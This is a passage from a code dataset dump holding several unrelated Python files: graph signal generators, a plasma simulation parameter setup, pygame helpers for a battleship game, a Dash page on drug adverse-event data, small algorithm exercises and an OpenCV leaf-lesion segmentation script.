len(G.nodes())-1)\n\t\tdistances = compute_distances(G.nodes()[v], G)\n\n\t\tif diam > duration:\n\t\t\tnum_snaps = diam\n\t\telse:\n\t\t\tnum_snaps = duration\n \n\t\tfor i in range(num_snaps):\n\t\t\tr = int(i * math.ceil(float(diam)/duration))\n \n\t\t\tF = compute_embedding(distances, r, G)\n\t\t\tFs.append(F)\n \n\treturn numpy.array(Fs)\n\ndef generate_dyn_heat(G, s, jump, n):\n\tFs = []\n\tL = networkx.normalized_laplacian_matrix(G)\n\tL = L.todense()\n\tF0s = []\t\n\tseeds = []\n\n\tfor i in range(s):\n\t\tF0 = numpy.zeros(len(G.nodes()))\n\t\tv = random.randint(0, len(G.nodes())-1)\n\t\tseeds.append(v)\n\t\tF0[v] = len(G.nodes())\n\t\tF0s.append(F0)\n\n\tFs.append(numpy.sum(F0s, axis=0))\n\n\tfor j in range(n):\n\t\tFIs = []\n\t\tfor i in range(s):\n\t\t\tFI = numpy.multiply(linalg.expm(-j*jump*L), F0s[i])[:,seeds[i]]\n\t\t\tFIs.append(FI)\n\t\t\n\t\tFs.append(numpy.sum(FIs, axis=0))\n\n\treturn numpy.array(Fs)[1:]\n\ndef generate_dyn_gaussian_noise(G, n):\n\tFs = []\n\t\n\tfor j in range(n):\n\t\tF = numpy.random.rand(len(G.nodes()))\n\t\tFs.append(F)\n\n\treturn numpy.array(Fs)\n\ndef generate_dyn_bursty_noise(G, n):\n\tFs = []\n\tbursty_beta = 1\n\tnon_bursty_beta = 1000\n\tbursty_bursty = 0.7\n\tnon_bursty_non_bursty = 0.9\n\tbursty = False\n\n\tfor j in range(n):\n\t\tr = random.random()\n\n\t\tif not bursty:\n\t\t\tif r > non_bursty_non_bursty:\n\t\t\t\tbursty = True\n\t\telse:\n\t\t\tif r > bursty_bursty:\n\t\t\t\tbursty = False\n\n\t\tif bursty:\t\n\t\t\tF = numpy.random.exponential(bursty_beta, len(G.nodes()))\n\t\telse:\n\t\t\tF = numpy.random.exponential(non_bursty_beta, len(G.nodes()))\n\t\t\t\n\t\tFs.append(F)\n\n\treturn numpy.array(Fs)\n\ndef generate_dyn_indep_cascade(G, s, p):\n\tFs = []\n\t\n\tseeds = numpy.random.choice(len(G.nodes()), s, replace=False)\n\t\n\tF0 = numpy.zeros(len(G.nodes()))\n\t\n\tind = {}\n\ti = 0\n\n\tfor v in G.nodes():\n\t\tind[v] = i\n\t\ti = i + 1\n\t\n\tfor s in seeds:\n\t\tF0[s] = 2.0\n\n\twhile True:\n\t\tF1 = numpy.zeros(len(G.nodes()))\n\t\tnew_inf = 0\n\t\tfor v in G.nodes():\n\t\t\tif F0[ind[v]] > 1.0:\n\t\t\t\tfor u in G.neighbors(v):\n\t\t\t\t\tr = random.random()\n\t\t\t\t\tif r <= p and F0[ind[u]] < 1.0:\n\t\t\t\t\t\tF1[ind[u]] = 2.0\n\t\t\t\t\t\tnew_inf = new_inf + 1\n\t\t\t\tF1[ind[v]] = 1.0\n\t\t\t\tF0[ind[v]] = 1.0\n\t\t\telif F0[ind[v]] > 0.0:\n\t\t\t\tF1[ind[v]] = 1.0\n\t\t\n\t\tFs.append(F0)\n\t\t\n\t\tif new_inf == 0 and len(Fs) > 1:\n\t\t\tbreak\n\n\t\tF0 = numpy.copy(F1)\n\t\n\treturn numpy.array(Fs)\n\ndef generate_dyn_linear_threshold(G, s):\n\tFs = []\n\t\n\tseeds = numpy.random.choice(len(G.nodes()), s, replace=False)\n\t\n\tF0 = numpy.zeros(len(G.nodes()))\n\tthresholds = numpy.random.uniform(0.0,1.0,len(G.nodes()))\n\t\n\tind = {}\n\ti = 0\n\n\tfor v in G.nodes():\n\t\tind[v] = i\n\t\ti = i + 1\n\t\n\tfor s in seeds:\n\t\tF0[s] = 1.0\n\n\twhile True:\n\t\tF1 = numpy.zeros(len(G.nodes()))\n\t\tnew_inf = 0\n\t\tfor v in G.nodes():\n\t\t\tif F0[ind[v]] < 1.0:\n\t\t\t\tn = 0\t\t\t\n\t\t\t\tfor u in G.neighbors(v):\n\t\t\t\t\tif F0[ind[u]] > 0:\n\t\t\t\t\t\tn = n + 1\n\t\t\t\t\n\t\t\t\tif (float(n) / len(G.neighbors(v))) >= thresholds[ind[v]]:\n\t\t\t\t\tF1[ind[v]] = 1.0\n\t\t\t\t\tnew_inf = new_inf + 1\n\t\t\telse:\n\t\t\t\tF1[ind[v]] = 1.0\t\t\t\t\t\n\t\n\t\tFs.append(F0)\n\t\t\n\t\tif new_inf == 0 and len(Fs) > 1:\n\t\t\tbreak\n\n\t\tF0 = numpy.copy(F1)\n\t\n\treturn numpy.array(Fs)\n","sub_path":"lib/syn.py","file_name":"syn.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"402367642","text":"#!/usr/bin/env python3\n\"\"\"Initialize the project's data space.\n\nIterates over all defined state points and initializes\nthe associated job workspace directories.\"\"\"\nimport logging\n\nimport prepic.lwfa as lwfa\nimport signac\nimport unyt as u\nimport numpy as np\nimport math\n\n# The number of output hdf5 files, such that Nz * Nr * NUMBER_OF_H5 * size(float64)\n# easily fits in RAM\nNUMBER_OF_H5 = 200\n\n\ndef main():\n \"\"\"Main function, for defining the parameter(s) to be varied in the simulations.\"\"\"\n project = signac.init_project(\"fbpic-project\", workspace=\"/scratch/berceanu/runs/signac-driven-fbpic/workspace/\")\n\n for a0 in np.linspace(start=0.5, stop=5.0, num=2):\n sp = dict(\n # The simulation box\n Nz=4096, # Number of gridpoints along z\n zmin=-70.0e-6, # Left end of the simulation box (meters)\n zmax=30.0e-6, # Right end of the simulation box (meters)\n Nr=256, # Number of gridpoints along r\n rmax=30.0e-6, # Length of the box along r (meters)\n Nm=2, # Number of modes used\n # The particles\n # Position of the beginning of the plasma (meters)\n p_zmin=0.0e-6,\n # Maximal radial position of the plasma (meters)\n p_rmax=27.0e-6,\n n_e=7.5e18 * 1.0e6, # Density (electrons.meters^-3)\n p_nz=2, # Number of particles per cell along z\n p_nr=2, # Number of particles per cell along r\n p_nt=4, # Number of particles per cell along theta\n # The laser\n a0=a0, # Laser amplitude\n w0=9.0e-6, # Laser waist\n ctau=9.0e-6, # Laser duration\n z0=0.0e-6, # Laser centroid\n zf=0.0e-6, # Laser focal plane position\n lambda0=0.8e-6, # Laser wavelength (meters)\n n_c=None, # critical plasma density for this laser (electrons.meters^-3)\n # do not change below this line ##############\n p_zmax=2250.0e-6, # Position of the end of the plasma (meters)\n # The density profile\n ramp_start=0.0e-6,\n ramp_length=375.0e-6, # increase (up to `p_zmax`) !\n # The interaction length of the simulation (meters)\n # increase (up to `p_zmax`) to simulate longer distance!\n L_interact=None,\n # Period in number of timesteps\n diag_period=None,\n # Timestep (seconds)\n dt=None,\n # Interaction time (seconds) (to calculate number of PIC iterations)\n # (i.e. the time it takes for the moving window to slide across the plasma)\n T_interact=None,\n # Number of iterations to perform\n N_step=None,\n )\n\n laser = lwfa.Laser.from_a0(\n a0=sp[\"a0\"] * u.dimensionless,\n τL=(sp[\"ctau\"] * u.meter) / u.clight,\n beam=lwfa.GaussianBeam(w0=sp[\"w0\"] * u.meter, λL=sp[\"lambda0\"] * u.meter),\n )\n sp[\"n_c\"] = laser.ncrit.to_value('1/m**3')\n\n sp[\"L_interact\"] = 900.0e-6 - (sp[\"zmax\"] - sp[\"zmin\"])\n sp[\"dt\"] = (sp[\"zmax\"] - sp[\"zmin\"]) / sp[\"Nz\"] / u.clight.to_value('m/s')\n sp[\"T_interact\"] = (sp[\"L_interact\"] + (sp[\"zmax\"] - sp[\"zmin\"])) / u.clight.to_value('m/s')\n sp[\"N_step\"] = int(sp[\"T_interact\"] / sp[\"dt\"])\n sp[\"diag_period\"] = math.ceil(sp[\"N_step\"] / NUMBER_OF_H5)\n\n project.open_job(sp).init()\n\n project.write_statepoints()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n main()\n","sub_path":"signac/src/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"414015835","text":"import sys\nimport pygame.freetype\n\nBLUE = (106, 159, 181)\nDARKBLUE = (0, 0, 55)\nRED = (255, 50, 50)\nWHITE = (255, 255, 255)\nGREEN = (0, 200, 0)\nLIGHTGREY = (197, 212, 219)\nDARKGREY = (145, 157, 163)\n\nASPECTRATIO = 16 / 9\n\npygame.init()\n\ninfo = pygame.display.Info()\n\nif info.current_w / info.current_h < ASPECTRATIO:\n\tWINDOWWIDTH = info.current_w - 100\n\tWINDOWHEIGHT = int(info.current_w / ASPECTRATIO) - 100\nelse:\n\tWINDOWHEIGHT = info.current_h-100 # 1670\n\tWINDOWWIDTH = int(ASPECTRATIO * WINDOWHEIGHT)\n\n\nBTNHEIGHT = int(WINDOWHEIGHT / 15)\nBTNWIDTH = BTNHEIGHT * 6\nBTNSPACING = 1.5\nFONTSIZE = int(BTNHEIGHT / 2.5)\n\nBTNWIDTH_SMALL = int(BTNHEIGHT * 1)\nBTNHEIGHT_SMALL = int(BTNHEIGHT * 1)\nFONTSIZE_SMALL = int(BTNHEIGHT_SMALL / 2.5)\n\n\n\n\n#850\nboardSize = (WINDOWWIDTH/2) - 100 # 750\n\nFAQ_SIZE = None\nFAQ_FONTSIZE = int(FONTSIZE * 0.55)\nFAQ\t= \t\"\"\"Welcome to battleship! Prepare for war!\n\\n How To Play \\n\nIn this game, each player can place up to six ships on their board.\\n\nPlayers take turns attacking enemy vessels. \\n\nThe game is over when someone loses their whole fleet.\\n\n\\n GameSetup \\n\nSelect to play against a human or computer with the Player button.\\n\nSelect the number of ships to place with the '# of Ships' button.\\n\nIf playing against the computer, change the difficulty with 'Difficulty' button. \\n\nYou can change the volume with the two 'BGM' and 'SFX' buttons.\\n\n\\n\nGood luck sardine, you're going to need it!\"\"\"\n\ndef createParagraph(text, fontSize, textcolor, bgcolor, paragraphSize):\n\t#paragraphSize= (xsize, ysize)\n\t#fontSize=font.get_height()\n\tfont = pygame.freetype.SysFont(\"Courier\", fontSize, bold = True)\n\n\tparagraphSurf = pygame.Surface(paragraphSize)\n\n\tparagraphSurf.fill(BLUE)\n\tparagraphSurf.set_colorkey((0, 0, 0))\n\n\tsplitLines = text.splitlines()#False)\n\t#print(splitLines)\n\n\n\n\toffSet = (paragraphSize[1] - len(splitLines) * (fontSize + 1)) // 2\n\n\tfor idx, line in enumerate(splitLines):\n\t\tcurrentTextline, _ = font.render(text=line, fgcolor=WHITE, bgcolor=BLUE)\n\t\t#currentPosition = (0, idx * fontSize + offSet)\n\t\t#center paragraph\n\t\tcurrentPosition = ((paragraphSize[0] - currentTextline.get_width()) // 2, #x-coordinate\n idx * fontSize + offSet) #y-coordinate\n\t\tparagraphSurf.blit(currentTextline, currentPosition)\n\n\treturn paragraphSurf, paragraphSize\n\n\n\t#backButton = button(x, y, w, h, inactive, active, mainMenu()):\n\n\t#for event in pygame.event.get():\n\t\t#if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n\t\t\t#self.stateName = 'mainMenu'\n\t\t\t#break\n\ndef createText(text, fontSize, textcolor, bgcolor):\n font = pygame.freetype.SysFont(\"Courier\", fontSize, bold=True)\n surface, rect = font.render(text=text, fgcolor=textcolor, bgcolor=bgcolor)\n return surface\n\ndef quitGame():\n pygame.quit()\n sys.exit()\n\n\n\ndef defaultAction():\n print('no action defined')\n","sub_path":"auxx.py","file_name":"auxx.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"143393090","text":"from typing import Tuple\nfrom urllib.parse import parse_qs, quote_plus, unquote_plus, urlencode, urlparse\n\nimport dash\nimport dash.dependencies as dd\nimport dash_html_components as html\nimport dash_table\nimport pandas as pd\nfrom app import app\nfrom apps.components.commons import (\n EICasDeclareFigureBox,\n EIRepartitionAgeGraphBox,\n EIRepartitionGraviteGraphBox,\n EIRepartitionHLTBox,\n EIRepartitionSexeFigureBox,\n EITauxDeclarationBox,\n EITauxDeclarationSeveriteBox,\n Header,\n NoData,\n PatientsTraites,\n RepartitionNotificateursFigureBox,\n SystemesOrganes,\n last_update,\n)\n\nfrom .footer import footer_content\nfrom .utils import Box\nfrom dash.development.base_component import Component\nfrom dash.exceptions import PreventUpdate\nfrom datamed_custom_components.Accordion import Accordion\nfrom db import fetch_data, substance\nfrom sm import SideMenu\n\nfrom ..constants.colors import PIE_COLORS_SUBSTANCE\nfrom .utils import Box, Grid, TopicSection, trim_list\n\n\ndef EffetsIndesirablesTooltip(tooltip_open=False) -> Component:\n return Box(\n Accordion(\n [\n html.P(\n \"La pharmacovigilance a pour objet la surveillance des médicaments et la prévention du risque \"\n \"d’effet indésirable résultant de leur utilisation, que ce risque soit potentiel ou avéré. \"\n \"Elle constitue une garantie qui s’exerce tout au long de la vie d’un médicament.\",\n ),\n html.P(\n [\n html.Span(\n \"La Base Nationale de Pharmacovigilance (BNPV) est une base de données située à l'ANSM \"\n \"qui est alimentée par les Centres Régionaux de Pharmacovigilance (CRPV) après évaluation, \"\n \"validation et imputation des déclarations de cas d'effets indésirables. Ils sont notifiés \"\n \"par les professionnels de santé ou par les patients et association agréées via un portail dédié : \",\n ),\n html.A(\n \"signalement.social-sante.gouv.fr\",\n href=\"https://signalement.social-sante.gouv.fr\",\n className=\"Link\",\n target=\"_blank\",\n ),\n ]\n ),\n html.P(\n \"Les indicateurs représentent le nombre de cas notifiés d’effets indésirables en France, estimé à partir des données de la BNPV. \"\n \"Afin de conserver l'anonymat des patients, si un effet indésirable est déclaré dans moins de 11 cas au total, cet effet ne sera \"\n \"pas affiché. Cela permet de ne pas identifier le ou les patients concernés, notamment en cas d'effets rares.\",\n ),\n ],\n isOpenOnFirstRender=tooltip_open,\n labelClass=\"InternalLink normal-text\",\n label=\"Comment sont calculés ces indicateurs ? D'où viennent ces données ?\",\n ),\n )\n\n\ndef substance_layout(code: str) -> Tuple[Component, html.Div]:\n \"\"\"\n @param code: substance code\n \"\"\"\n df_sub = substance.get_substance_df(code)\n series_sub = fetch_data.as_series(df_sub)\n df_sub_spe = substance.list_specialite(code)\n df_age = substance.get_age_df(code)\n df_sexe = substance.get_sexe_df(code)\n df_expo = substance.get_exposition_df(code)\n df_notif = substance.get_notif_df(code)\n df_cas_age = substance.get_age_cas_df(code)\n df_cas_sexe = substance.get_sexe_cas_df(code)\n df_gravite = substance.get_gravite(code)\n\n return (\n Header(series_sub, type=\"substance\"),\n html.Div(\n [\n html.Div(\n [\n SideMenu(\n id=\"side-menu\",\n items=[\n {\"id\": \"patients-traites\", \"label\": \"Population concernée\"},\n {\n \"id\": \"effets-indesirables\",\n \"label\": \"Effets indésirables\",\n },\n {\n \"id\": \"liste-specialites\",\n \"label\": \"Liste des spécialités\",\n },\n ],\n className=\"SideMenu\",\n ),\n html.Div(\n html.Div(\n [\n PatientsTraites(\n df_age=df_age,\n df_sexe=df_sexe,\n df_expo=df_expo,\n type=\"substance\",\n pie_colors=PIE_COLORS_SUBSTANCE,\n ),\n EffetsIndesirables(\n df_expo,\n df_notif,\n df_cas_age,\n df_cas_sexe,\n df_gravite,\n ),\n SystemesOrganes(df_expo, df_sub),\n ListeSpecialites(df_sub, df_sub_spe),\n ],\n className=\"ContentWrapper\",\n ),\n className=\"ContentLayoutWrapper\",\n ),\n ],\n ),\n footer_content()\n ], className=\"container-fluid stackableContainer\",\n ),\n )\n\n\ndef ListeSpecialites(df_sub: pd.DataFrame, df_sub_spe: pd.DataFrame) -> Component:\n series_sub = fetch_data.as_series(df_sub)\n if df_sub_spe is not None:\n df_sub_spe.nom = df_sub_spe.nom.str.capitalize()\n box_children = [\n html.Div(\n \"{} médicaments identifiés\".format(len(df_sub_spe)),\n className=\"normal-text mt-3\",\n style={\"color\": \"#33C2D6\"},\n ),\n dash_table.DataTable(\n id=\"substance-specialite-table\",\n columns=[{\"name\": \"nom\", \"id\": \"nom\"}],\n data=df_sub_spe.reset_index().to_dict(\"records\"),\n page_size=10,\n style_as_list_view=True,\n style_table={\"overflowX\": \"auto\"},\n style_cell={\n \"height\": \"50px\",\n \"backgroundColor\": \"#FFF\",\n },\n style_data={\n \"fontSize\": \"14px\",\n \"fontWeight\": \"400\",\n \"font-family\": \"Roboto\",\n \"lineHeight\": \"18px\",\n \"textAlign\": \"left\",\n },\n style_header={\"display\": \"none\"},\n ),\n ]\n else:\n box_children = [\n html.Div(\n \"Aucun médicament identifié\",\n className=\"normal-text mt-3\",\n style={\"color\": \"#33C2D6\"},\n )\n ]\n\n return TopicSection(\n [\n html.H2(\n \"Spécialités de médicaments contenant : {}\".format(\n series_sub.nom.capitalize()\n ),\n className=\"SectionTitle\",\n ),\n Box(box_children),\n ],\n id=\"liste-specialites\",\n )\n\n\ndef EffetsIndesirables(\n df_expo: pd.DataFrame,\n df_notif: pd.DataFrame,\n df_cas_age: pd.DataFrame,\n df_cas_sexe: pd.DataFrame,\n df_gravite: pd.DataFrame,\n) -> Component:\n children = [\n html.H2(\n \"Cas déclarés d'effets indésirables de la substance active\",\n className=\"SectionTitle\",\n ),\n html.Span(\"mise à jour des données : {}\".format(last_update)),\n ]\n dataframes = [df_expo, df_notif, df_cas_age, df_cas_sexe, df_gravite]\n if all(df is None for df in dataframes):\n children.extend([EffetsIndesirablesTooltip(), NoData()])\n else:\n children.extend(\n [\n EffetsIndesirablesTooltip(),\n Box(\n [\n html.H4(\"Précision sur les déclarations d'effets indésirables\"),\n html.Div(\n [\n html.Img(\n src=app.get_asset_url(\"communique_120.svg\"),\n className=\"m-1 mr-4\",\n ),\n html.Div(\n [\n html.P(\n [\n html.B(\n \"Les données affichées sur les effets indésirables sont basées sur le déclaratif. \"\n ),\n \"Elles concernent les effets suspectés d’être liés à l’utilisation d’un ou plusieurs \"\n \"médicaments, ainsi que les mésusages, abus ou erreurs médicamenteuses. Il s’agit de cas évalués \"\n \"et validés par un comité d’experts.\",\n ],\n className=\"text-justify mt-4\",\n ),\n html.P(\n [\n \"L’ANSM se sert des déclarations spontanées que font les patients ou les professionnels de santé pour \",\n html.B(\n \"détecter des signaux en pharmacovigilance. \"\n ),\n \"Ce relevé des déclarations ne permet en aucun cas d'être \"\n \"exhaustif et de connaître la fréquence exacte de survenue des effets indésirables liés à l'exposition à un médicament.\",\n ],\n className=\"text-justify mt-4\",\n ),\n html.P(\n [\n html.Span(\n \"Pour plus d’informations, consultez : \",\n className=\"mt-4\",\n ),\n html.A(\n \"https://ansm.sante.fr/page/la-surveillance-renforcee-des-medicaments\",\n href=\"https://ansm.sante.fr/page/la-surveillance-renforcee-des-medicaments\",\n className=\"Link\",\n target=\"_blank\",\n ),\n ],\n className=\"text-justify\",\n ),\n ],\n ),\n ],\n className=\"d-flex flex-row flex-wrap\",\n ),\n ],\n ),\n EICasDeclareFigureBox(df_expo),\n Grid(\n [\n # EITauxDeclarationBox(df_expo),\n EIRepartitionSexeFigureBox(df_cas_sexe),\n EIRepartitionAgeGraphBox(df_cas_age, PIE_COLORS_SUBSTANCE),\n EIRepartitionGraviteGraphBox(df_gravite, PIE_COLORS_SUBSTANCE),\n # EITauxDeclarationSeveriteBox(df_expo, df_gravite),\n ],\n items_classname=\"col-12 col-sm-6 col-md-6\",\n ),\n RepartitionNotificateursFigureBox(df_notif),\n ]\n )\n return TopicSection(\n children,\n id=\"effets-indesirables\",\n )\n\n\n@app.callback(\n dd.Output(\"url\", \"href\"),\n dd.Input(\"substance-specialite-table\", \"active_cell\"),\n dd.State(\"substance-specialite-table\", \"page_current\"),\n dd.State(\"substance-specialite-table\", \"page_size\"),\n dd.State(\"substance-specialite-table\", \"data\"),\n)\ndef getActiveCell(active_cell, page_current, page_size, data):\n if active_cell:\n row = active_cell[\"row\"]\n cellData = data[(page_current or 0) * page_size + row][\"cis\"]\n return \"/specialite?\" + urlencode({\"search\": quote_plus(cellData)})\n else:\n raise PreventUpdate\n\n\n@app.callback(\n [\n dd.Output(\"update-on-click-data\", \"is_open\"),\n dd.Output(\"body-modal\", \"children\"),\n dd.Output(\"header-modal\", \"children\"),\n ],\n [\n dd.Input({\"type\": \"close-backdrop-substance\", \"index\": dd.ALL}, \"n_clicks\"),\n dd.Input(\"url\", \"href\"),\n dd.Input({\"type\": \"soc-treemap-substance\", \"index\": dd.ALL}, \"clickData\"),\n ],\n)\ndef open_ei_modal_on_substance_page(clicks_close, href, click_data):\n # beware! with Input id as object click_data is a list !!\n changed_id = [p[\"prop_id\"] for p in dash.callback_context.triggered][0]\n\n # User has not clicked on modal yet\n if not click_data or not trim_list(click_data):\n raise PreventUpdate()\n # Modal has been closed by user\n if \"close-backdrop\" in changed_id:\n return False, \"\", \"\"\n current_entry = click_data[0][\"points\"][0][\"entry\"]\n # User is going up in treemap\n if current_entry != \"\":\n return False, \"\", \"\"\n\n selected_soc = click_data[0][\"points\"][0][\"label\"]\n\n parsed_url = urlparse(unquote_plus(href))\n query = parse_qs(parsed_url.query)\n sub_code = query[\"search\"][0]\n df_hlt = substance.get_hlt_df(sub_code)\n df_hlt = df_hlt[df_hlt.soc_long == selected_soc].sort_values(\n by=\"pourcentage_cas\", ascending=False\n )\n\n return (\n True,\n EIRepartitionHLTBox(df_hlt),\n selected_soc,\n )\n","sub_path":"datamed/web/apps/components/substance.py","file_name":"substance.py","file_ext":"py","file_size_in_byte":14751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"640690850","text":"def caculate_2(temps):\n# print(temps,end=' ')\n y = temps.copy()\n y.reverse()\n index=0\n for x in range(len(y)):\n index = index + y[x]*(2**x)\n# print(index)\n answera.append(index)\n\ndef caculate_3(temps):\n# print(temps,end=' ')\n y = temps.copy()\n y.reverse()\n index=0\n for x in range(len(y)):\n index = index + y[x]*(3**x)\n# print(index)\n answerb.append(index)\n\nsec = input()\nthird = input()\na1 = list(sec)\nb1 = list(third)\na = [int(i) for i in a1]\nb = [int(i) for i in b1]\nk = [0,1,2]\nanswera = list()\nanswerb = list()\nanswer = list()\nfor i in range(len(a)):\n# print(\"2进制-{}change:\".format(i))\n temp = a.copy()\n temp[i] = 1-temp[i]\n caculate_2(temp)\nfor i in range(len(b)):\n# print(\"3进制-{}change:\".format(i))\n temp = b.copy()\n k1 = k.copy()\n k1.pop(temp[i])\n# print(k1)\n for j in range(2):\n temp[i] = k1[j]\n# print(temp)\n caculate_3(temp)\nfor i in range(len(answera)):\n temp0 = answera[i]\n for j in range(len(answerb)):\n if temp0==answerb[j]:\n answer.append(temp0)\nprint(answer[0],end='')\n\n","sub_path":"Code/CodeRecords/2951/60716/256083.py","file_name":"256083.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"536340392","text":"def solution(bridge_length, weight, truck_weights):\n answer = 0\n # bridge의 길이만큼 on_bridge에 o을 넣어 가상의 bridge 생성\n on_bridge = [0] * bridge_length\n \n # on_bridge에 요소가 존재할 동안\n while on_bridge:\n # 시간(answer)에 += 1을 해준 뒤 아래 작업 수행\n answer += 1\n # 시간 += 1이 되었기 때문에 한 단계 앞으로 나아감을 나타내기 위해\n # on_bridge에서 dequeue\n on_bridge.pop(0)\n\n # truck_weights에 요소가 남아 있는 동안\n if truck_weights:\n # 현재 on_bridge에 있는 트럭의 모든 무계의 합 + truck_weights[0]의 합이\n # 다리가 견딜 수 있는 무게(weight) 이하일 경우\n if sum(on_bridge) + truck_weights[0] <= weight:\n # on_bridge에 truck_weights[0]을 enqueue\n on_bridge.append(truck_weights[0])\n # on_bridge에 추가한 트럭을 dequeue\n truck_weights.pop(0)\n else:\n # 다리의 길이를 유지하기 위해 on_dridge에 0을 enqueue\n on_bridge.append(0)\n return answer\n","sub_path":"code/shinn92kr/stack&queue/프로그래머스_다리를지나는트럭.py","file_name":"프로그래머스_다리를지나는트럭.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"62823757","text":"#import required packages and functions\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport imageio\nfrom skimage import util\nfrom skimage.data import astronaut\nfrom skimage.color import rgb2gray\nfrom skimage.filters import sobel\nfrom skimage.segmentation import felzenszwalb, slic, quickshift, watershed\nfrom skimage.segmentation import mark_boundaries\nfrom skimage.util import img_as_float\nfrom skimage import io, color\nfrom skimage import morphology\nimport cv2\nfrom functools import reduce\nfrom skimage.feature import peak_local_max\nfrom skimage import data, img_as_float\nfrom PIL import Image\nimport PIL.ImageOps\nfrom scipy import ndimage as ndi\nfrom skimage.morphology import extrema\nfrom skimage.measure import label\nfrom skimage import exposure\nimport os\n\npath_folder_raw = \"O:/FIP/2018/WW023/RefTraits/Macro/stb_senescence2018_fpww023/macro_outcomes\"\n\n#function to list all images to analyze\ndef list_files(dir):\n file_list = []\n for (dirpath, dirnames, filenames) in os.walk(dir):\n for f in filenames:\n if f.endswith(\"leafOriginal.png\"):\n if \"_t3_\" in f:\n file_list.append(os.path.join(dirpath, f))\n return file_list\n\n#list all images to analyze\nfiles = list_files(path_folder_raw)\n\nsave_path = \"O:/FIP/2018/WW023/RefTraits/Preprocessed/t3/\"\n\n#iterate over images\nfor k in files:\n\n try:\n\n # Load image, convert from BGR to RGB\n img = cv2.cvtColor(cv2.imread(k),\n cv2.COLOR_BGR2RGB)\n img.shape # a three dimensional array\n\n # crop to area of interest, removing black lines\n img = img[350:1900, 275:8200]\n\n # remove white background\n # blur image a bit\n blur = cv2.GaussianBlur(img, (15, 15), 2)\n\n # mask for paper background\n lower_white = np.array([200, 200, 200], dtype=np.uint8) # threshold for white pixels\n upper_white = np.array([255, 255, 255], dtype=np.uint8)\n mask1 = cv2.inRange(blur, lower_white, upper_white) # could also use threshold\n # mask needs to be inverted,\n # since we want to set the BACKGROUND to white\n mask1 = cv2.bitwise_not(mask1)\n\n # There are still spots not belonging to the leaf\n # remove small objects to get rid of them\n\n # find all connected components\n nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(mask1, connectivity=8)\n # connectedComponentswithStats yields every seperated component with information on each of them, such as size\n # take out the background which is also considered a component\n sizes = stats[1:, -1];\n nb_components = nb_components - 1\n\n # minimal size of particle\n # somwhere between largest unreal feature and leaf size\n min_size = 500000\n\n # cleaned mask\n mask_cleaned = np.zeros((output.shape))\n # for every component in the image,\n # keep only those above min_size\n for i in range(0, nb_components):\n if sizes[i] >= min_size:\n mask_cleaned[output == i + 1] = 255\n\n # apply cleaned mask to the image\n [indx, indy] = np.where(mask_cleaned == 0)\n Color_Masked = img.copy()\n Color_Masked[indx, indy] = 255\n\n # Transform to HSV\n img = cv2.cvtColor(Color_Masked, cv2.COLOR_RGB2HSV)\n\n # Create a mask for brown pixels\n mask = cv2.inRange(img, np.array([0, 95, 95]),np.array([30, 255, 255]))\n\n\n ####\n\n img_fill_holes = ndi.binary_fill_holes(cv2.bitwise_not(mask), structure=np.ones((4,4))).astype(np.uint8)\n img_fill_holes = cv2.floodFill(img_fill_holes, mask, (0, 0), 255);\n\n ####\n\n\n # Fill holes in the mask\n\n img_fill_holes = ndi.binary_fill_holes(mask, structure=np.ones((20,20))).astype(np.uint8)\n\n # Remove Noise\n ## Rectangular Kernel\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(6,6))\n ## Remove noise by morphological opening\n opening = cv2.morphologyEx(img_fill_holes, cv2.MORPH_OPEN, kernel)\n\n # Remove small areas\n ## Find all connected components\n nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(opening, connectivity=8)\n ## ConnectedComponentswithStats yields every seperated component with information on each of them, such as size\n ## Take out the background which is also considered a component\n sizes = stats[1:, -1]; nb_components = nb_components - 1\n ## Define minimal size of particle\n min_size = 10001\n ## Create cleaned mask\n mask_cleaned = np.zeros((output.shape))\n ## for every component in the image,\n ## keep only those above min_size\n for i in range(0, nb_components):\n if sizes[i] >= min_size:\n mask_cleaned[output == i + 1] = 255\n mask_cleaned = np.uint8(mask_cleaned)\n\n # Find contours\n _, contours, _ = cv2.findContours(mask_cleaned, mode=cv2.RETR_TREE, method=cv2.CHAIN_APPROX_SIMPLE)\n\n # Draw contours onto original image\n cnt = cv2.drawContours(Color_Masked, contours, -1, (128,255,0), 2)\n\n # plot\n fig, ax = plt.subplots(1, 2, figsize=(10, 10), sharex=True, sharey=True)\n ax[0].imshow(mask)\n ax[0].set_title(\"dcs\")\n ax[1].imshow(img_fill_holes)\n ax[1].set_title(\"original\")\n plt.tight_layout()\n plt.show()\n\n cnt = cv2.resize(cnt, (0, 0), fx=0.5, fy=0.5)\n\n\n # Save overlay\n filename = os.path.basename(k)\n cv2.imwrite(save_path + filename, cv2.cvtColor(cnt, cv2.COLOR_RGB2BGR))\n\n except:\n\n print(\"Error in: \" + k)\n\n########################################################################################################################\n# Segment leaf from background\n########################################################################################################################\n\n# Load image, convert from BGR to RGB\nimg = cv2.cvtColor(cv2.imread(r\"O:\\Projects\\KP0011\\3\\RefData\\Test_py\\fpww023_t5_fungic_sn127_5_leafOriginal.png\"),\n cv2.COLOR_BGR2RGB)\nimg.shape #a three dimensional array\n\n#crop to area of interest, removing black lines\nimg = img[350:1900, 270:8200]\n\n#remove white background\n#blur image a bit\nblur = cv2.GaussianBlur(img, (15, 15), 2)\n\n#mask for paper background\nlower_white = np.array([200, 200, 200], dtype=np.uint8) #threshold for white pixels\nupper_white = np.array([255, 255, 255], dtype=np.uint8)\nmask1 = cv2.inRange(blur, lower_white, upper_white) # could also use threshold\n#mask needs to be inverted,\n#since we want to set the 